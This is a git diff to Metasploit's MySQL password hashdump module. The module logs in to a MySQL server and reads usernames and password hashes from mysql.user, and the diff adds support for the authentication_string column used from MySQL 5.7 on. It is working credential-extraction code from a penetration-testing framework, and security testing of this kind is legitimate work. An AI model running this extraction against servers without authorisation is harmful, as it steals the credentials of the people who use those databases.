diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index 65fb904c6d..f1adde3fe7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -12,10 +12,10 @@ class MetasploitModule < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Password Hashdump', - 'Description' => %Q{ + 'Description' => %( This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. - }, + ), 'Author' => ['theLightCosine'], 'License' => MSF_LICENSE ) @@ -23,48 +23,10 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mysql_login_datastore) - return - end + return unless mysql_login_datastore service_data = { - address: ip, - port: rport, - service_name: 'mysql', - protocol: 'tcp', - workspace_id: myworkspace_id - } - - credential_data = { - module_fullname: self.fullname, - origin_type: :service, - private_data: datastore['PASSWORD'], - private_type: :password, - username: datastore['USERNAME'] - } - - credential_data.merge!(service_data) - - credential_core = create_credential(credential_data) - - login_data = { - core: credential_core, - last_attempted_at: DateTime.now, - status: Metasploit::Model::Login::Status::SUCCESSFUL - } - login_data.merge!(service_data) - - create_credential_login(login_data) - - #Grabs the username and password hashes and stores them as loot - res = mysql_query("SELECT user,password from mysql.user") - if res.nil? - print_error("There was an error reading the MySQL User Table") - return - end - - service_data = { - address: ::Rex::Socket.getaddress(rhost,true), + address: ip, port: rport, service_name: 'mysql', protocol: 'tcp', @@ -72,10 +34,54 @@ class MetasploitModule < Msf::Auxiliary } credential_data = { - origin_type: :service, - jtr_format: 'mysql,mysql-sha1', - module_fullname: self.fullname, - private_type: :nonreplayable_hash + module_fullname: self.fullname, + origin_type: :service, + private_data: datastore['PASSWORD'], + private_type: :password, + username: datastore['USERNAME'] + } + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + } + login_data.merge!(service_data) + + create_credential_login(login_data) + + # Grab the username and password hashes and store them as loot + version = mysql_get_variable("@@version") + + # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'. + if version[0..2].to_f > 5.6 + res = mysql_query("SELECT user,authentication_string from mysql.user") + else + res = mysql_query("SELECT user,password from mysql.user") + end + + if res.nil? + print_error("There was an error reading the MySQL User Table") + return + end + + service_data = { + address: ::Rex::Socket.getaddress(rhost, true), + port: rport, + service_name: 'mysql', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + jtr_format: 'mysql,mysql-sha1', + module_fullname: self.fullname, + private_type: :nonreplayable_hash } credential_data.merge!(service_data) @@ -87,17 +93,12 @@ class MetasploitModule < Msf::Auxiliary print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}") credential_core = create_credential(credential_data) login_data = { - core: credential_core, - status: Metasploit::Model::Login::Status::UNTRIED + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED } login_data.merge!(service_data) create_credential_login(login_data) end end - end - - - - end